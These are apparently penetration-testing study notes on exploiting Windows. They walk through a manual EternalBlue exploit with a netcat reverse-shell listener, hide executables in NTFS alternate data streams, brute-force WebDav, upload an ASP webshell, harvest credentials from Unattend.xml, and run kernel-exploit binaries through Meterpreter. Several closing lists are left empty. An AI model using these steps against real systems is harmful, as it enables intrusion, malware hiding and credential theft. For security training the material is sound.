Windows
Windows OS is the most used Operating System, with over 70% share and developed in C programming language.
Windows
Windows OS is the most used Operating System, with over 70% share and developed in C programming language.
There were (are?) critical vulnerabilities and thus it is a OS subject to attacks.
Sometimes, a new version of Windows tends to solve a vulnerability, but not every company is updated with new versions.
Useful Windows Commands
Get all users:
net users
Get current user:
whoami
Get hostname:
hostname
Get local administrator groups:
net localgroup administrators
Get local groups:
net localgroup
Get your account:
getuid
Get your privileges:
getprivs
List installed programs:
wmic product get name,version
List network interfaces:
ipconfig /all
List running processes:
tasklist
List startup programs:
wmic startup get caption,command
Show user details:
net user <username>
System info:
systeminfo
Start a Shell session
shell
Exploit Windows
Access Token Impersonation
Access Token are a core in the Windows authentication and are managed by the Local Security Authority Subsystem Service (LSASS)
The Access Token is used to identify and describe the security context of a process running on the system.
Access Tokens are generated by winlogon.exe everytime an user authenticates and includes the identity and privileges of the user account associated with the process.
We can use these techniques to gain access and elevate your privileges with Metasploit.
You can try to exploit and impersonate token with a module called Incognito.
Alternate Data Streams (ADS)
Alternate Data Streams (ADS) is a NTFS file attribute that was designed to create compatibility with the MacOS HFS (Hierarchical File System).
Any file created on a NTFS formatted drive will have two streams: data stream and resource stream.
The data stream is the content of the file (like the text in a text file or audio in audio file).
The resource stream is the information of the file (like when is created, by whom, the dimensions, ecc).
Attackers can use ADS to hide malicious code in files in order to avoid detection.
Create a "secret" filenotepad text.txt:secret.txt
After this command the notepad will be open and you can write/edit the secret.txt file.
When you save, you will only see the text.txt file, empty!
If you want to edit/access that hidden file you have to use notepad text.txt:secret.txt again.
Hide a file "behind" a text file:type file.exe > otherfile.txt:file.exe
Create an hidden link to the file:
mklink wupdate.exe C:\Temp\windowslog.txt:winpeas.exe
BlueKeep
BlueKeep is a RDP vulnerability where attackers can gain access to Windows system,
by gaining access to a chunk of the kernel and executing arbitrary code into the target.
Please note that writing code into the kernel can make the system crash.
This vulnerability can be exploited with Metasploit framework.
Clearing Windows Event Logs
The Windows OS saves and stores every log on the Windows Event log.
Those are stored and categorized based on the type of event they store.
Credential Dumping - Password Hashes
The Windows OS stores the account password locally in the SAM (Security Accounts Manager): a databases that stores the hashed password, the authentication and validation of the credentials is facilitated by the Local Security Authority (LSA).
Searching for Passwords in Windows Configuration Files
Windows as an utility called Unattended Windows Setup Utility that is used to
mass-configure Windows on different systems.
This utilty, if left after the installation, can become vulnerable since
it stores the administrator credentials too.
Usually this utility files are stored in the C:\\Windows\Panther\Unattended.xml or Autonattend.xml
You can use Metasploit framework.
EternalBlue
EternalBlue is a collection of Windows vulnerabilities that allowed attacked to gain access to Windows systems.
This vulnerability can be exploited manually (see below) or with Metasploit framework.
EternalBlue manual exploit
Perform a port scan on 445 to check for version and os for SMB port:sudo nmap -sV -p 445 -O target-ip
Check if the target os is vulnerable to EternalBlue:
sudo nmap -sV -p 445 --script=smb-vuln-ms17-010 target-ip
Clone the AutoBlue-MS17-010 repository from github
Change directory to shellcode:
cd shellcode
Change privilegies of that script:
chmod +x shell_prep.sh
Execute the script:
./shell_prep.sh
Confirm (y)
Write your ip:
your-ip
Write the two LPORT(s)
Type 0 or 1
Type 0 or 1
In other terminal, write the port you have wrote for LPORT above to make it listen to that port:
nc -nvlp Lport
cd ..
Make the script executable:
chmod +x eternalblue_exploit7.py
Specify the 32 or 64 version and the Windows version:
python eternalblue_exploit7.py target-ip shellcode/sc_x64.bin
Keylogging
Keylogging is the process of capturing the keystrokes entered on a system.
After you exploit a Windows target with Metasploit shell, you can execute some commands on the Meterpreter shell
Pass-the-Hash Attacks
Pass-the-hash attacks are a Windows vulnerability techniques to harvest NTLM hashes or clear-text passwords
and using them to authenticate with the target legitimately.
You can use the Meterpreter shell and Metasploit PsExec module or Crackmapexec tool.
WebDav
Microsoft IIS is a web server created by Windows. It provides a GUI for web applications.
It can be used to host pages with asp.net and php.
WebDav is an extension of the http protocol.
It is used to edit and manage files on a web server (like the IIS).
Both IIS and WebDav is usually on port 80 or 443, and you can authenticate with username and password.
Tools used to manually exploit WebDav:
Nmap command tells us that the target has WebDav.
You can confirm it by trying to navigate to target-url/webdav.
If it asks for credentials then you can use Hydra to perform a login credentials brute-force on webdav.
After you have got the right credentials you can use them to log in the browser on WebDav folder.
We can use DavTest tool to try to check what kind files or folders we can execute, upload, edit, ecc.
Now we can use Cadaver to upload, execute, edit files.cadaver http://target-ip/target-folder
Write username and password
Write your commands on the gained Shell
You can put a more advanced shell with Cadaver:
put /usr/share/webshells/asp/webshell.asp
Now you can use the web-shell directly in the browser!
WinRM
Windows Remote Managment (WinRM) is a remote protocol that can facilitate the access of Windows systems over HTTP(s).
It typically runs on ports 5985 or 5986 (but it must be configured since its not a protocol that is used on default).
WinRM uses various forms of authentication. You can use Crackmapexec to perform brute-force to gain credentials.
You can also use a Ruby script called "evil-winrm" to obtain a command shell session on the target.
Windows Kernel Exploits
Escalation privileges is the process to exploit a vulnerability on a target and elevate privileges of an user.
The Kernel is a computer program that is the core of an operating system and has complete access to resources and hardware of a system.
Windows NT is a kernel that is used on Windows and has
the User and Kernel mode (first one has limited privileges, while the second one has full access).
Privilege Escalation on Windows will usually follow this guidelines:
Some of the tools used are:
Use Windows Kernel Exploits
After you have gained access to a Windows target with Metasploit.
Move to C folder:cd C:\\
Move to the Temp folder:
cd Temp:\\
Upload the .exe file you have got from the GitHub repo, specifying the folder/path where you saved the .exe file:
upload your-folder/your-file.exe
Use the shell on the Temp folder:
shell
Execute your .exe file that you have just uploaded:
.\your-file.exe
Windows Vulnerabilities
Most common Windows vulnerabilities are:
Most Exploited Windows services: